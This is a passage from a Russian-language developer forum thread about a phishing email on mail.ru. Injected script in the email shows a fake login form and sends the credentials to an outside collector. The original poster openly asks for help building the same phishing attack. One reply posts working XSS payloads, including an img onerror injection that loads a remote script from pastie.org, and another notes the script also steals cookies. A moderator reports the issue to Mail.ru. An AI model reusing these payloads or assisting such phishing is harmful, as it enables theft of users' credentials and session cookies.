очень интересный фишинг

[vagabunt]

Здравствуйте, уважаемые.

Дело тут такое. Пришло вчера мне на почту письмо, (mail.ru)



с темой документы срочно. Открываю меня сразу перекидывает в папку входящие





Но я думаю глюк какой то. Через 30 секунд всплывает аут форма.



Форма отправляет данные на парсер, который находится на холмах. (hut.ru)


Я попытался сделать такую фичу самостоятельно. Вытащил html из тела письма. Но чет не получается.

Кто бы мне мог помочь в этом деле? Товарищи знатоки.

Спасибо за внимание)

[melky]

картинки бы посжимать, а то вёрстка поехала ... ну да ладно

меня бы как пользователя, насторожило бы это



красненькой стрелочкой помечено что-то неведомое (ломание вёрстки, xss?)

красненьким овальчиком - это похоже на ajax spinner с facebook, что оно тут делает?

PS наконец то попробовал gimp 2.8

[vagabunt]

Где изображение там это.



Ведет на js файл с этим содержанием.

http://zalil.ru/33232691

PS. Сюда скопировать не мог, так как превышает 10000 символов

А где красненький кружечек, там ничего особенного когда mail не может загрузить картинку он выдает
такую вот штучку

[vagabunt]

Мне собственно говоря, какой злоумышленники отправляют код)) Чтобы в страницу mail.ru впечатался так сказать свой java который через 30 секунд после открытия письма выдавал фишинговую форму прям на сайте)

[B@rmaley.e><e]

Сообщение от vagabunt

Ведет на js файл с этим содержанием. http://zalil.ru/33232691

А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)

[vagabunt]

Сообщение от B@rmaley.e><e

А там, в свою очередь это: http://pastebin.com/YN5TriVm Оно ещё и куки пытается стащить. vagabunt, лучше сообщите об этом в техподдержку mail.ru А ещё лучше — пользуйтесь GMail :-)

Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)

[Kolyaj]

vagabunt,
а исходник письма можете показать?

[Илья Кантор]

Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за

[melky]

Сообщение от vagabunt

Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)

обычная xss ... вот пример покруче

<img src onerror=alert('XSS')>

вместо alert'а можно подставить, что хочешь.

и кстати, скрипт можно было вставить короче :

<img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;>

только вот вопрос.. как оно на mail.ru прошло?

[vagabunt]

Сообщение от Илья Кантор

Информация отправлена разработчикам Mail.ru Надеюсь, топикстартер только за

Вот топикстартер не фига не за

Топикустартеру интересно)) какой скрипт отсылают через сендер)